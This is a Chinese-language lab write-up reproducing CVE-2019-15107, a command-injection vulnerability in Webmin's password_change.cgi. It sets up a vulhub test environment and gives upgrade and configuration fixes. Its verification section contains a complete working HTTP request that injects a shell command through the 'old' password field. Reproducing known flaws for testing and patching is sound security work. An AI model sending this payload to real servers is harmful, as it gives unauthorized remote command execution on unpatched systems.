【CVE-2019-15107】Webmin远程命令执行漏洞复现

0x00 漏洞概述

Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。

Webmin 1.920及之前版本中的password_change.cgi存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中，网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。

0x01 影响版本

Webmin <= 1.920

0x02 漏洞评级

严重

0x03 漏洞环境搭建

使用vulhub上的docker环境搭建。

使用wget命令下载yml文件：

wget https://raw.githubusercontent.com/vulhub/vulhub/master/webmin/CVE-2019-15107/docker-compose.yml

下载完成后执行 docker-compose up -d 命令，启动webmin 1.910。

浏览器访问漏洞环境，如果出现以下界面，则说明环境搭建成功。

0x04 漏洞验证

访问 https:///password_change.cgi 并用burp抓取数据包。

将内容改为如下payload，执行的命令为 id。

POST /password_change.cgi HTTP/1.1
Host: 192.168.50.44:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://192.168.50.44:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

发送payload，发现命令执行成功。

0x05 修复建议

目前Webmin官方已发布最新版本Webmin 1.940 修复了该漏洞，请受影响的用户尽快升级至最新版本：
下载链接：http://webmin.com/download.html

临时解决方案：
1.900 到 1.920版本的用户，编辑Webmin配置文件：/etc/webmin/miniserv.conf，注释或删除“passwd_mode=”行，然后运行/etc/webmin/restart 重启服务命令。

注：修复漏洞前请将资料备份，并进行充分测试。






参考链接：https://www.jianshu.com/p/6db98793d043